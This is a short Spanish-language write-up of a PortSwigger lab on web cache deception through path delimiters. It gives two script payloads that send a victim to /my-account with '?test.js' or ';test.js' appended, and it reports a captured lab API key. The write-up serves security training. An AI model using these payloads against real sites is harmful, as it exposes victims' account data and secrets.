🍨Laboratorio: Explotación de delimitadores de ruta para el engaño de caché web (v2)


Muy parecido al anterior pero en este nos centraremos en encontrar cual es el delimitador.
Url De cheat Sheets: https://portswigger.net/web-security/web-cache-deception/wcd-lab-delimiter-list
Si, uso burp intruder →


La caché web tambien interpreta los delimitadores directamente como las extensiones estaticas →

Exploit - Payload:
<script>document.location="https://URL.web-security-academy.net/my-account?test.js"</script> #Delimitador 1
<script>document.location="https://URL.web-security-academy.net/my-account;test.js"</script> #delimitador 2
Probaré con el delimitador #2 →

Y luego actualizo la pagina de my-account en mi browser →

Y pudé acceder a la API key de carlos -> omq64daoMaG5BHl0Ffa7izKF8eKqCJie

PreviousLaboratorio: Explotación del mapeo de rutas para el engaño de caché webNextLaboratorio: Explotación de la normalización del servidor de origen para el engaño de la caché web
Last updated